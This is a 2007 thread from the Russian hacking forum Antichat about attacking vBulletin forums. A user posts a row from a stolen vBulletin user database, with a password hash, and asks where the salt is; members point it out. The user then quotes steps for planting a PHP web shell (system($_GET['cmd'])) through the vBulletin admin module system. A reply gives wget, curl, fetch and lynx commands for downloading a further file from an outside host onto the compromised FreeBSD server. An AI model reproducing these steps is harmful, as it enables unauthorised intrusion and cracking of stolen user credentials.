ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

vBulletin [db] Где соль?
  #1  
Старый 15.01.2007, 00:50
Аватар для Krasti
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328

Репутация: 4
По умолчанию vBulletin [db] Где соль?

Может глупый вопрос, но что-то понять не могу. Вот сдамбил базу юзеров, получил примерно вот такую тему:
PHP код:
INSERT INTO vb_user VALUES('1','6','','0','Rich','6c507b8dd286d058e69a37436a751bde','2006-11-20','***@gmail.com','0','','','','','','2','Администратор','0','1127663100','0','1159464415','1163971905','1152297660','33','10','5','3','0','0','0','0','2135','','0000-00-00','-1','1','','0','0','','0','0','-1','0','0','p\\u','2','','2','1','1'); 
А соль здесь получается "p\\u", или что?

Добавил: И что бы новую тему не создавать, помгите пожалуйста.
Цитата:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?

Последний раз редактировалось Krasti; 15.01.2007 в 00:53..
 
Ответить с цитированием

  #2  
Старый 15.01.2007, 00:52
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

соль в булке состоит из 3 знаков, может в другой таблице
 
Ответить с цитированием

  #3  
Старый 15.01.2007, 00:55
Аватар для Krasti
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328

Репутация: 4
По умолчанию

Цитата:
Сообщение от maxster  
соль в булке состоит из 3 знаков, может в другой таблице
Лучше от этого мне не стало. Кстати во второй базе такая же тема, может что не так делаю? Да по другому вроде никак.

А может вообще в булке быть пароль без соли?
 
Ответить с цитированием

  #4  
Старый 15.01.2007, 00:58
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

да вот она "p\u"..просто первый символ "\" добавляется для экранирования некоторых символов (в данном случае "\"), который могут нарушить работу скрипта.

Последний раз редактировалось злюка; 15.01.2007 в 01:08..
 
Ответить с цитированием

  #5  
Старый 15.01.2007, 01:46
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Цитата:
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?
вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное
Код:
- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links  -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c
на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp
__________________
 
Ответить с цитированием

  #6  
Старый 15.01.2007, 02:03
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

Цитата:
Сообщение от Krasti  
Цитата:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?
собственно шелл ты мы уже получили, зачем еще один
 
Ответить с цитированием

  #7  
Старый 15.01.2007, 08:40
Аватар для Krasti
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328

Репутация: 4
По умолчанию

Цитата:
Сообщение от +toxa+  
вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное
Код:
- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links  -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c
на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp
Большое спасибо!
 
Ответить с цитированием

  #8  
Старый 15.01.2007, 08:42
Аватар для Krasti
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328

Репутация: 4
По умолчанию

Цитата:
Сообщение от злюка  
собственно шелл ты мы уже получили, зачем еще один
Я понимаю, что шелл есть, просто юзать такой шелл для меня труднова-то. Вот я и хочу залить шелл, который мне нравится. Кстати, спасибо за помощь.
 
Ответить с цитированием

  #9  
Старый 15.01.2007, 21:06
Аватар для ReanimatoR
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209

Репутация: 341
Отправить сообщение для ReanimatoR с помощью ICQ
По умолчанию

вместо этого смд можешь спокойно заливать свой нормальный шелл!
 
Ответить с цитированием

  #10  
Старый 15.01.2007, 21:12
Аватар для Krasti
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328

Репутация: 4
По умолчанию

Да я знаю, но работать он что-то отказывался. А смд пашет нормально.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
vBulletin v3.0.1. Стырил хэш, а вот как соль достать? GoreAD Форумы 3 19.12.2006 04:42
Есть доступ в админку. Где находятся мд5 хеши юзверов? (vBulletin 3.0.8) stalles Форумы 7 25.11.2006 20:36
Можно ли имея хеш и соль войти в админку не подбирая пароль? (Vbulletin 3.5.3) banall Форумы 3 18.10.2006 14:43
Соль vBulletin Loading Форумы 7 09.08.2006 16:56
Где скачать vBulletin Федя Болталка 1 31.07.2006 21:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ